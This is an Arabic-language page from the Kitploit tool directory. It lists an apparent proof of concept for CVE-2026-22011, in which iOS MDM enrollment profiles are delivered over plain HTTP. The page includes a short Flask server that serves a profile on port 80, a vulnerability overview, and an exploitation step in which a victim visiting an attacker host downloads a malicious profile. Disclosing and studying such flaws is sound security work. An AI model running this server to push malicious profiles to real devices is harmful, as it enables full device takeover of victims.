Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-22011-iOS-MDM-Profile-Delivery-over-HTTP — خادم PoC مبني على Flask لثغرة CVE-2026-22011، يقدّم ملف تعريف تسجيل MDM خبيث لأجهزة iOS عبر HTTP، مما يتيح اعتراض الاتصالات عبر هجوم الوسيط واختراق الجهاز. | Kitploit
أدوات/GitHubGitHub/george0papasotiriou/cve-2026-22011-ios-mdm-profile-delivery-over-http
أمان iOSتحليل الثغرات الأمنيةالاستغلالأمن الشبكاتاختبار الاختراقأمن الجوال
GitHubgeorge0papasotiriou/cve-2026-22011-ios-mdm-profile-delivery-over-http

CVE-2026-22011-iOS-MDM-Profile-Delivery-over-HTTP

خادم PoC مبني على Flask لثغرة CVE-2026-22011، يقدّم ملف تعريف تسجيل MDM خبيث لأجهزة iOS عبر HTTP، مما يتيح اعتراض الاتصالات عبر هجوم الوسيط واختراق الجهاز.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 16 أياملم تتم المراجعة بعد

CVE-2026-22011 – تسليم ملف تعريف MDM لنظام iOS عبر HTTP

كود البرنامج (خادم Python Flask MDM)

root@kitploit:~
# mdm_server.py - Serves enrollment profile over plain HTTP
from flask import Flask, send_file

app = Flask(__name__)
@app.route('/enroll.mobileconfig')
def serve_profile():
    # Vulnerability: profile delivered without HTTPS
    return send_file('profile.mobileconfig', mimetype='application/x-apple-aspen-config')

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)

CVE-2026-22011 – تسليم ملف تعريف MDM لنظام iOS عبر HTTP

Severity: High

نظرة عامة

يتم تقديم ملف تعريف تسجيل MDM عبر HTTP عادي دون تشفير أو التحقق من التوقيع الرقمي. يمكن للمهاجم على نفس الشبكة اعتراض الطلب واستبدال الملف التعريفي بملف خبيث، مما يمنحه صلاحيات إدارة الجهاز.

تفاصيل الثغرة

  • النوع: رجل في المنتصف / نقل غير آمن
  • التأثير: اختراق كامل للجهاز عبر MDM خبيث.
  • السبب الجذري: عنوان URL للملف التعريفي هو HTTP، ولا يفرض iOS استخدام HTTPS لتسجيل MDM (يعتمد على الإعدادات)، مما يتيح الاعتراض.

عرض الاستغلال

شغّل خادم HTTP الخاص بالمهاجم:

root@kitploit:~
python mdm_server.py

عندما يزور الضحية http://attacker/enroll.mobileconfig، يتم تنزيل الملف التعريفي الخبيث.

تنزيل الأداة